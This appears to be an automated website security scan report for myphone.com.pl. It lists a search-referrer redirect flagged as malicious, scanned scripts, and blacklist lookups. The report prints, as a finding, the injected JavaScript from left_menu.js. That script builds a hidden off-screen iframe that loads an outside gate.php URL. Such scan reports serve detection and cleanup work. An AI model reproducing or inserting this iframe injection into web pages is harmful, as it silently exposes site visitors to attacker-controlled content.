Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://myphone.com.pl/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: myphone.com.pl Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Thu, 25 Dec 2014 10:43:42 GMT Location: http://lharmoniejewelry.com/whwd.html?h=1604137 Server: Apache Content-Length: 231 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://myphone.com.pl/ | 200 OK Content-Length: 19157 Content-Type: text/html | clean |
http://myphone.com.pl/java/left_menu.js | 200 OK Content-Length: 2897 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var _f = document.createElement('iframe'),
_r = 'setAttribute';
_f[_r]('src', 'http://ukworkaccidentclaim.co.uk/gate.php');
_f.style.position = 'absolute';
_f.style.width = '10px';
_f[_r]('frameborder', navigator.userAgent.indexOf('bf3f1f8686832c30d7c764265f8e7ce8') + 1);
_f.style.left = '-5540px';
document.write('<div id=\'MIX_ADS\'></div>');
document.getElementById('MIX_ADS').appendChild(_f); Antivirus reports:
| ||
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 19470 Content-Type: text/javascript | clean |
http://www.sonyericsson.co.jp/blogparts/semcjticker.js | HTTP/1.1 301 Moved Permanently Location: http://www.sonymobile.co.jp/blogparts/semcjticker.js Content-Length: 224 | clean |
http://www.sonymobile.co.jp/blogparts/semcjticker.js | 404 Not Found Content-Length: 35887 Content-Type: text/html | clean |
http://www.sonymobile.co.jp/_res/js/common-lib.min.js | 200 OK Content-Length: 161803 Content-Type: text/javascript | clean |
http://www.sonyericsson.co.jp/_res/js/common.js | HTTP/1.1 301 Moved Permanently Location: http://www.sonymobile.co.jp/_res/js/common.js Content-Length: 224 | clean |
http://www.sonymobile.co.jp/_res/js/common.js | 200 OK Content-Length: 16794 Content-Type: text/javascript | clean |
http://www.sonyericsson.co.jp/shared/_res/js/transition.js | HTTP/1.1 301 Moved Permanently Location: http://www.sonymobile.co.jp/shared/_res/js/transition.js Content-Length: 224 | clean |
http://www.sonymobile.co.jp/shared/_res/js/transition.js | 200 OK Content-Length: 2067 Content-Type: text/javascript | clean |
http://www.sonyericsson.co.jp/shared/_res/js/common.js | HTTP/1.1 301 Moved Permanently Location: http://www.sonymobile.co.jp/shared/_res/js/common.js Content-Length: 224 | clean |
http://www.sonymobile.co.jp/shared/_res/js/common.js | 200 OK Content-Length: 345 Content-Type: text/javascript | clean |
http://www.sonyericsson.co.jp/shared/js/s_code_pc_prod.js | HTTP/1.1 301 Moved Permanently Location: http://www.sonymobile.co.jp/shared/js/s_code_pc_prod.js Content-Length: 224 | clean |
http://www.sonymobile.co.jp/shared/js/s_code_pc_prod.js | 200 OK Content-Length: 62322 Content-Type: text/javascript | clean |
http://www.sonyericsson.co.jp/ | HTTP/1.1 301 Moved Permanently Location: http://www.sonymobile.co.jp Content-Length: 224 | clean |
http://www.sonymobile.co.jp/ | 200 OK Content-Length: 21795 Content-Type: text/html | clean |
http://www.sonymobile.co.jp/shared/js/slider.js | 200 OK Content-Length: 5045 Content-Type: text/javascript | clean |
http://www.sonyericsson.co.jp/shared/js/index_mv.js | HTTP/1.1 301 Moved Permanently Location: http://www.sonymobile.co.jp/shared/js/index_mv.js Content-Length: 224 | clean |
http://www.sonymobile.co.jp/shared/js/index_mv.js | 200 OK Content-Length: 791 Content-Type: text/javascript | clean |
http://www.sonyericsson.co.jp/shared/js/ua_content_ch.js | HTTP/1.1 301 Moved Permanently Location: http://www.sonymobile.co.jp/shared/js/ua_content_ch.js Content-Length: 224 | clean |
http://www.sonymobile.co.jp/shared/js/ua_content_ch.js | 200 OK Content-Length: 2070 Content-Type: text/javascript | clean |
http://www.sonyericsson.co.jp/shared/js/selectivizr-min.js | HTTP/1.1 301 Moved Permanently Location: http://www.sonymobile.co.jp/shared/js/selectivizr-min.js Content-Length: 224 | clean |
http://www.sonymobile.co.jp/shared/js/selectivizr-min.js | 200 OK Content-Length: 4836 Content-Type: text/javascript | clean |
http://www.sonyericsson.co.jp/xperia/ | HTTP/1.1 301 Moved Permanently Location: http://www.sonymobile.co.jp/xperia/ Content-Length: 224 | clean |
http://www.sonymobile.co.jp/xperia/ | 200 OK Content-Length: 16640 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=myphone.com.pl
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://myphone.com.pl/
Result: myphone.com.pl is not infected or malware details are not published yet.
Result: myphone.com.pl is not infected or malware details are not published yet.